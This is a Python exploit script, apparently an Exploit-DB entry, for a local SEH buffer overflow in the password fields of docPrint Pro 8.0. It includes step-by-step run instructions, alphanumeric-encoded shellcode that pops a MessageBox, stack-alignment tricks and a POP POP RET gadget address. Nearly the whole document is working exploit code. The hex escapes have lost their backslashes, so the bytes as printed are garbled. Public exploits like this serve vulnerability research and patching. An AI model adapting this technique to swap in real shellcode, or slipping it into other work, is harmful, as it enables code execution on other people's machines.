docPrint Pro 8.0 – SEH Buffer Overflow
import struct
# Title: docPrint Pro v8.0 'User/Master Password' Local SEH Alphanumeric Encoded Buffer Overflow
# Date: September 14th, 2019
# Author: Connor McGarr (@33y0re) (https://connormcgarr.github.io)
# Vendor Homepage: http://www.verypdf.com
# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe
# Version: 8.0
# Tested on: Windows 10 and Windows 7
# TO RUN:
# 1. Create a blank file named "test.pdf"
# 2. Open doc2pdf_win.exe
# 3. When the application loads, go to Settings > PDF Security > and check "Encrypt PDF File"
# 4. Run this python script. Copy the contents and paste it into the "User Password" and "Master Password" fields and press "okay"
# 5. Click "Add File(s)"
# 6. Select the "test.pdf" file created from step 1.
# 7. Press on "Start" and name the file "exploit.pdf"
# Unusual bad characters include: x01x05x07x08x09 (and the usual suspects that are not ASCII)
# Zero out registers for calculations.
zero = "x25x01x01x01x01"
zero += "x25x10x10x10x10"
# Stack alignment
alignment = "x54" # push esp
alignment += "x58" # pop eax
alignment += "x2dx1ax50x55x55" # sub eax, 0x1a505555
alignment += "x2dx1ax4ex55x55" # sub eax, 0x1a4e5555
alignment += "x2dx1ax4ex55x55" # sub eax, 0x1a4e5555
alignment += "x50" # push eax
alignment += "x5c" # pop esp
# Custom created and encoded MessageBox POC shellcode.
# Utilized aplication DLL with no ASLR for Windows API call to MessageBox function.
# x31xc0x50x68
# x42x41x4ax41
# x89xe1x50x68
# x42x41x4ax41
# x89xe2x50x50
# x51x52x50xbe
# x38x20x00x10
# xffxe6x41x41
# 534F1555 534F0255 53500157 (bit of byte mangling after jmp esi, but works nonetheless!)
shellcode = zero # zero out eax
shellcode += "x2dx55x15x4fx53" # sub eax, 0x534f1555
shellcode += "x2dx55x02x4fx53" # sub eax, 0x534f0255
shellcode += "x2dx57x01x50x53" # sub eax, 0x53500157
shellcode += "x50" # push eax
# 4F554A42 4F554A42 51554B44
shellcode += zero # zero out eax
shellcode += "x2dx42x4ax55x4f" # sub eax, 0x4f554a42
shellcode += "x2dx42x4ax55x4f" # sub eax, 0x4f554a42
shellcode += "x2dx44x4bx55x51" # sub eax, 0x51554b44
shellcode += "x50" # push eax
# 153A393A 153A393A 173B3B3B
shellcode += zero
shellcode += "x2dx3ax39x3ax15" # sub eax, 0x173b3b3b
shellcode += "x2dx3ax39x3ax15" # sub eax, 0x153a393a
shellcode += "x2dx3bx3bx3bx17" # sub eax, 0x173b3b3b
shellcode += "x50" # push eax
# 3A3A1927 3A3A0227 3B3B0229
shellcode += zero # zero out eax
shellcode += "x2dx27x19x3ax3a" # sub eax, 0x3a3a1927
shellcode += "x2dx27x02x3ax3a" # sub eax, 0x3a3a0227
shellcode += "x2dx29x02x3bx3b" # sub eax, 0x3b3b0229
shellcode += "x50" # push eax
# 3F3C3F3F 3F3C3F3F 403D4040
shellcode += zero # zero out eax
shellcode += "x2dx3fx3fx3cx3f" # sub eax, 0x3f3c3f3f
shellcode += "x2dx3fx3fx3cx3f" # sub eax, 0x3f3c3f3f
shellcode += "x2dx40x40x3dx40" # sub eax, 0x403d4040
shellcode += "x50" # push eax
# 323A1A27 323A0227 333B0229
shellcode += zero # zero out eax
shellcode += "x2dx27x1ax3ax32" # sub eax, 0x323a1a27
shellcode += "x2dx27x02x3ax32" # sub eax, 0x323a0227
shellcode += "x2dx29x02x3bx33" # sub eax, 0x333b0229
shellcode += "x50" # push eax
# 3F3C3F3F 3F3C3F3F 403D4040
shellcode += zero # zero out eax
shellcode += "x2dx3fx3fx3cx3f" # sub eax, 0x3f3c3f3f
shellcode += "x2dx3fx3fx3cx3f" # sub eax, 0x3f3c3f3f
shellcode += "x2dx40x40x3dx40" # sub eax, 0x403d4040
shellcode += "x50" # push eax
# 323A1545 323A1545 333B1545
shellcode += zero # zero out eax
shellcode += "x2dx45x15x3ax32" # sub eax, 0x323a1545
shellcode += "x2dx45x15x3Ax32" # sub eax, 0x323a1545
shellcode += "x2dx45x15x3bx33" # sub eax, 0x333b1545
shellcode += "x50" # push eax
# Let's roll.
payload = "x41" * 1676
payload += "x70x06x71x06" # JO 6 bytes. If fails, JNO 6 bytes
payload += struct.pack('<l ', 0x10011874) # pop ebp pop ebx ret reg.dll
payload += "x41" * 2 # Padding to reach alignment
payload += alignment
payload += shellcode
payload += "x45" * (6000-len(payload))
# Write to file
f = open('bajablast.txt', 'w')
f.write(payload)
f.close()
https://www.exploit-db.com/exploits/47394
Gloss